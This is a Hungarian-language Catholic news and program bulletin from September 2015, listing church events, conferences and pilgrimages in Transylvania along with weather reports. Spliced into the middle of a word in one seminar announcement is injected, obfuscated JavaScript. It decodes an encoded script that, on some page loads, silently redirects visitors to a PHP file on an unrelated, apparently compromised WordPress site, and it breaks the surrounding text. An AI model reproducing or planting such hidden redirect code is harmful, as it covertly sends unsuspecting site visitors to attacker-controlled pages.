2015. szeptember 21. – Hírek és programajánló

H Í R E K   E S T E

Nőszövetségek Országos találkozója
Szeptember 21-23 között kerül sor Nagyváradon az erdélyi római katolikus nőszövetségek egyesületének 16-ik találkozójára a Várad-olaszi Szent Rita és a Várad-velencei Lisieuxi Kis Szent Teréz nőszövetségek szervezésében. A találkozó fő támogatója a nagyváradi római katolikus Püspökség.

Tapasztalatcsere nőknek
A Szatmári Egyházmegyei Caritas Szervezet „A kiegyensúlyozott nő – fejlődés, család, karrier” nevet viselő, esélyegyenlőség témájában szervezett tapasztalatcserére várja az érdeklődő hölgyeket szeptember 22-én, holnap reggel kilenc órai kezdettel a szatmárnémeti Poesis Étteremben. A rendezvény célja a németországi, ausztriai, magyarországi és romániai jó gyakorlatok megosztása valamint a résztvevő szervezetek azon képességeinek és kompetenciáinak fejlesztése, melyek által a nők munkaerőpiacon való elhelyezkedését tudják segíteni. A találkozó keretén belül csoportos műhelyekre, külföldi és hazai szakemberek előadásaira kerül sor.
A tapasztalatcsere arra a kérdésre próbál választ találni, hogy hogyan lehet hozzájárulni egy olyan környezet kialakításához, mely a nők munkaerőpiacon való könnyebb elhelyezkedését ösztönzi.

Ünnepi vesperás a temesvári dómban
Szent Gellért napjának előestéjén, szeptember 23-án, szerdán délután fél hat órai kezdettel a temesvári Székeskáptalan tagjainak jelenlétében Roos (ejtsd: Rósz) Márton megyés püspök ünnepi vesperást tart a székesegyházban az egyházmegye első főpásztora és védőszentje tiszteletére.

Szent Pio ünnepe Székelyudvarhelyen
Szeptember 23-án, szerdán,  Szent Pio ünnepén, a székelyudvarhelyi  Mária Rádió és Szent Pio Lelkigyakorlatos ház kápolnájában este hat órától ünnepi szentmisét tartanak, melyet előadás követ. Szeretettel hívják a híveket a közös ünneplésre.

Élet a Lélekben szemináriumok
Szeptember 23-án, szerdán délután fél öt órakor rózsafüzér imával kezdik el a kilenc hetes Élet a Lélekben szemináriumot Csikszentmihályon. Az előadásokat a sepsiszentgyörgyi Élet a lélekben közösség tagjai tartják. A szemináriumon a fő munkát Isten Lelke végzi, de elvégzéséhez szükséges a kitartás, az őszinteség, a bátorság, és a hajlfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andóság a közösségi életre.
Sepsiszentgyörgyön a Krisztus Király altemplomában szeptember 28-án indul a szeminárium. Az előadások 9 egymást követő hétfőn este hét órától kezdődnek.

Egyházmegyei zarándoklat Nagycsanádra
Szeptember 24-én, csütörtökön, Szent Gellért ünnepén délelőtt tizenegy órai kezdettel a nagycsanádi templomban szentmisét celebrálnak. A liturgiára érkező zarándokcsoportok nem csak soknemzetiségű tájegységünket képviselik, Szent Gellért oltalmát kérni a határon túlról is érkeznek lelkipásztorok és hívek.

Medjugorje-i imaest
Imaestet tartanak Csíkszeredában a Segítő Mária Gimnázium bentlakásának dísztermében szeptember 25-én, pénteken, délután hat órától. Az imaprogram rózsafüzérrel kezdődik, majd szentmisével folytatódik és szentségimádással zárul. Szeretettel hívnak és várnak mindenkit a közös ünnepi imaestre!

II. Családi Vándor Kupa
Szeptember 26-án második alkalommal rendezik meg a Családi Vándor Kupát a Szatmárnémeti Szentlélek plébánián. Ez egy családi ügyességi vetélkető, amelyben szülő és gyermek egy csapatot alkot és versenybe száll a Családi Vándor Kupáért, ami a győztes család otthonát díszíti egy éven keresztül.  A vetélkedő mottója: „Ahol a család együtt játszik, nevet, küzd és győz!”

Biciklis zarándoklat a Gordon tetői Jézus kilátóhoz
A székelyudvarhelyi Szent Miklós plébánia, szeptember 26-án, szombaton, két órától biciklis zarándoklatot hirdet és szervez a Gordon-tetői Jézus kilátóhoz, amelyre szeretettel várják a gyerekeket, ifjakat, felnőtteket egyaránt. Ezzel a zarándoklattal a tanévet is szeretnék vidáman megnyitni, mely alkalmat ad imádkozásra, hitben való elmélyülésre, közösségi együttlétre.

Az időjárásról: Holnap változó időjárásra készülhetünk. A kialakuló gomolyfelfelhőzet mellett többé-kevésbé napos időre van kilátás. Csapadék inkább az erdélyi medencében valószínű. A hűvös hajnalt követően kellemes, 19-23 fok közötti maximumokra számíthatunk.

MRE - Hírszolgálat, 2015. szeptember 21.


H Í R E K   R E G G E L / D É L B E N

Együtt a fogyatékkal élőkért konferencia
A Gyulafehérvári Caritas Fogyatékkal élőket támogató szolgálata kilencedik éve szervezi meg Csíkszeredában az Együtt a fogyatékkal élőkért című konferenciáját a segítő szakmában dolgozó civil szervezetek munkatársai, szakemberek, szülők és fogyatékkal élők számára. Az idei konferencia társszervezői a Romániai Magyar Gyógypedagógusok Egyesülete, az Apáczai Csere János Pedagógusok Háza és a Romániai Magyar Pedagógusok Szövetsége. A konferencia témájaként speciális nevelési igényű gyerek kiskamaszkorba érkezésekor felmerülő oktatási, nevelési kérdéseit választották. A konferencia szakmai előadásokkal, változatos műhelymunkákkal várja a résztvevőket a mai nappal kezdődően és betekintést nyújt különböző megközelítési módokba, módszerekbe, utakat és lehetőségeket kínál a érdeklődőknek.

Tapasztalatcsere nőknek
A Szatmári Egyházmegyei Caritas Szervezet „A kiegyensúlyozott nő – fejlődés, család, karrier” nevet viselő, esélyegyenlőség témájában szervezett tapasztalatcserére várja az érdeklődő hölgyeket szeptember 22-én, holnap reggel kilenc órai kezdettel a szatmárnémeti Poesis Étteremben. A rendezvény célja a németországi, ausztriai, magyarországi és romániai jó gyakorlatok megosztása valamint a résztvevő szervezetek azon képességeinek és kompetenciáinak fejlesztése, melyek által a nők munkaerőpiacon való elhelyezkedését tudják segíteni. A találkozó keretén belül csoportos műhelyekre, külföldi és hazai szakemberek előadásaira kerül sor. A tapasztalatcsere arra a kérdésre próbál választ találni, hogy hogyan lehet hozzájárulni egy olyan környezet kialakításához, mely a nők munkaerőpiacon való könnyebb elhelyezkedését ösztönzi.

Ünnepi vesperás a temesvári dómban
Szent Gellért napjának előestéjén, szeptember 23-án, szerdán délután fél hat órai kezdettel a temesvári Székeskáptalan tagjainak jelenlétében Roos Márton megyés püspök ünnepi vesperást tart a székesegyházban az egyházmegye első főpásztora és védőszentje tiszteletére.

Szent Pio ünnepe Székelyudvarhelyen
Szeptember 23-án, szerdán,  Szent Pio ünnepén, a székelyudvarhelyi  Mária Rádió és Szent Pio Lelkigyakorlatos ház kápolnájában este hat órától ünnepi szentmisét tartanak, melyet előadás követ. Szeretettel hívják a kedves híveket a közös ünneplésre.

Élet a Lélekben szeminárium
Szeptember 23-án, szerdán délután fél öt órakor rózsafüzér imával kezdik el a kilenc hetes Élet a Lélekben szemináriumot Csikszentmihályon. Az előadásokat Bajcsi Tibor tartja.

Egyházmegyei zarándoklat Nagycsanádra
Szeptember 24-én, csütörtökön, Szent Gellért ünnepén délelőtt tizenegy órai kezdettel a nagycsanádi templomban szentmisét celebrálnak. A liturgiára érkező zarándokcsoportok nem csak soknemzetiségű tájegységünket képviselik, Szent Gellért oltalmát kérni a határon túlról is érkeznek lelkipásztorok és hívek.

Családkonferencia Csíkszeredában
„Zuhanás-emelkedés - családi krízisekről az irgalmasság évére készülve” mottóval szeptember 25-27 között tartják a XIII. Családkonferenciát a csíkszeredai Kós Károly Szakiskola dísztermében. A konferencián a házasság szakaszainak jellegzetes kihívásait, a kapcsolat változásával-fejlődésével együtt járó krízishelyzeteket elemzik. Meghívott előadók: Illyés Magda pszichológus, a kolozsvári Babes-Bolyai Tudományegyetem tanársegédje, Becsky Borbála, pszichológus, képződő családterapeuta, valamint Ilyés Zsolt, csíkszentléleki plebános. Várják a házaspárokat (együtt), papokat, szerzeteseket, segítő szakmabelieket, és mindazokat akik segíteni szeretnék a házaspárok életét.

II. Családi Vándor Kupa
Szeptember 26.-án második alkalommal rendezik meg a Családi Vándor Kupát a Szatmárnémeti Szentlélek plébánián. Ez egy családi ügyességi vetélkető, amelyben szülő és gyermek egy csapatot alkot és versenybe száll a Családi Vándor Kupáért, ami a győztes család otthonát díszíti egy éven keresztül.  A vetélkedő mottója: „Ahol a család együtt játszik, nevet, küzd és győz!”

Biciklis zarándoklat a Gordon tetői Jézus kilátóhoz
A székelyudvarhelyi Szent Miklós plébánia, szeptember 26-án, szombaton, két órától biciklis zarándoklatot hirdet és szervez a Gordon-tetői Jézus kilátóhoz, amelyre szeretettel várják a gyerekeket, ifjakat, felnőtteket egyaránt. Ezzel a zarándoklattal a tanévet is szeretnék vidáman megnyitni, mely alkalmat ad imádkozásra, hitben való elmélyülésre, közösségi együttlétre.

Az időjárásról: A fölénk érkezett hidegfrontnak köszönhetően megnövekszik a felhőzet, többfelé záporok, zivatarok kialakulására kell számítani. Megélénkül az északi-északnyugati szél. A csúcshőmérséklet 18 és 22 fok között alakul.

MRE - Hírszolgálat, 2015. szeptember 21.

About the author

maradmin

Leave a Comment